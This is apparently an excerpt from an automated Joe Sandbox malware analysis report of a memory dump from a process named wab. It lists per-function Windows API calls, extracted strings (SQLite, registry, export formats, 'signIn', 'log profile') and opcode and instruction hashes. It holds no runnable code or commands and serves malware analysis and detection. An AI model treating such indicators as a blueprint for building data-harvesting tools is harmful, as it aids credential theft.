                                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                    • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                    APIs
                                    • memset.MSVCRT ref: 00411AF6
                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                    • wcsrchr.MSVCRT ref: 00411B14
                                    • wcscat.MSVCRT ref: 00411B2E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                    • String ID: AE$.cfg$General$EA
                                    • API String ID: 776488737-1622828088
                                    • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                    • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                    • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                    • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                    APIs
                                    • memset.MSVCRT ref: 0040D8BD
                                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                    • memset.MSVCRT ref: 0040D906
                                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                    • _wcsicmp.MSVCRT ref: 0040D92F
                                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                    • String ID: sysdatetimepick32
                                    • API String ID: 1028950076-4169760276
                                    • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                    • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpy$memset
                                    • String ID: -journal$-wal
                                    • API String ID: 438689982-2894717839
                                    • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                    • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                    APIs
                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                    • EndDialog.USER32(?,00000002), ref: 00405C83
                                    • EndDialog.USER32(?,00000001), ref: 00405C98
                                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Item$Dialog$MessageSend
                                    • String ID:
                                    • API String ID: 3975816621-0
                                    • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                    • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                    • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                    • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                    APIs
                                    • _wcsicmp.MSVCRT ref: 00444D09
                                    • _wcsicmp.MSVCRT ref: 00444D1E
                                    • _wcsicmp.MSVCRT ref: 00444D33
                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _wcsicmp$wcslen$_memicmp
                                    • String ID: .save$http://$https://$log profile$signIn
                                    • API String ID: 1214746602-2708368587
                                    • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                    • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                    • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                    • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                    • String ID:
                                    • API String ID: 2313361498-0
                                    • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                    • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                    • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                    • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                    APIs
                                    • GetClientRect.USER32(?,?), ref: 00405F65
                                    • GetWindow.USER32(?,00000005), ref: 00405F7D
                                    • GetWindow.USER32(00000000), ref: 00405F80
                                      • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                    • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                    • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                    • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Window$ItemMessageRectSend$Client
                                    • String ID:
                                    • API String ID: 2047574939-0
                                    • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                    • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                    • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                    • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                    • String ID:
                                    • API String ID: 4218492932-0
                                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                    APIs
                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                    • memcpy.MSVCRT ref: 0044A8BF
                                    • memcpy.MSVCRT ref: 0044A90C
                                    • memcpy.MSVCRT ref: 0044A988
                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                    • memcpy.MSVCRT ref: 0044A9D8
                                    • memcpy.MSVCRT ref: 0044AA19
                                    • memcpy.MSVCRT ref: 0044AA4A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpy$memset
                                    • String ID: gj
                                    • API String ID: 438689982-4203073231
                                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpy
                                    • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                    • API String ID: 3510742995-2446657581
                                    • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                    • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                    • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                    • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                    APIs
                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                    • memset.MSVCRT ref: 00405ABB
                                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                    • SetFocus.USER32(?), ref: 00405B76
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: MessageSend$FocusItemmemset
                                    • String ID:
                                    • API String ID: 4281309102-0
                                    • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                    • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                    • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                    • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _snwprintfwcscat
                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                    • API String ID: 384018552-4153097237
                                    • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                    • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                    • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                    • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                    • String ID: 0$6
                                    • API String ID: 2029023288-3849865405
                                    • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                    • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                    • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                    • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                    APIs
                                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                    • memset.MSVCRT ref: 00405455
                                    • memset.MSVCRT ref: 0040546C
                                    • memset.MSVCRT ref: 00405483
                                    • memcpy.MSVCRT ref: 00405498
                                    • memcpy.MSVCRT ref: 004054AD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$memcpy$ErrorLast
                                    • String ID: 6$\
                                    • API String ID: 404372293-1284684873
                                    • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                    • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                    APIs
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                    • wcscpy.MSVCRT ref: 0040A0D9
                                    • wcscat.MSVCRT ref: 0040A0E6
                                    • wcscat.MSVCRT ref: 0040A0F5
                                    • wcscpy.MSVCRT ref: 0040A107
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                    • String ID:
                                    • API String ID: 1331804452-0
                                    • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                    • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                    APIs
                                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                    • String ID: advapi32.dll
                                    • API String ID: 2012295524-4050573280
                                    • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                    • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                    APIs
                                    Strings
                                    • <%s>, xrefs: 004100A6
                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                    • <?xml version="1.0" ?>, xrefs: 0041007C
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$_snwprintf
                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                    • API String ID: 3473751417-2880344631
                                    • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                    • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: wcscat$_snwprintfmemset
                                    • String ID: %2.2X
                                    • API String ID: 2521778956-791839006
                                    • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                    • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _snwprintfwcscpy
                                    • String ID: dialog_%d$general$menu_%d$strings
                                    • API String ID: 999028693-502967061
                                    • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                    • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpy$memsetstrlen
                                    • String ID:
                                    • API String ID: 2350177629-0
                                    • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                    • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                    • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                    • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset
                                    • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                    • API String ID: 2221118986-1606337402
                                    • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                    • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                    • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                    • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcmpmemset$_mbscpymemcpystrlen
                                    • String ID:
                                    • API String ID: 265355444-0
                                    • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                    • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                    • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                    • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                    APIs
                                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                      • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                      • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                    • memset.MSVCRT ref: 0040C439
                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                    • _wcsupr.MSVCRT ref: 0040C481
                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                    • memset.MSVCRT ref: 0040C4D0
                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                    • String ID:
                                    • API String ID: 1973883786-0
                                    • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                    • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                    APIs
                                    • memset.MSVCRT ref: 004116FF
                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                    • API String ID: 2618321458-3614832568
                                    • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
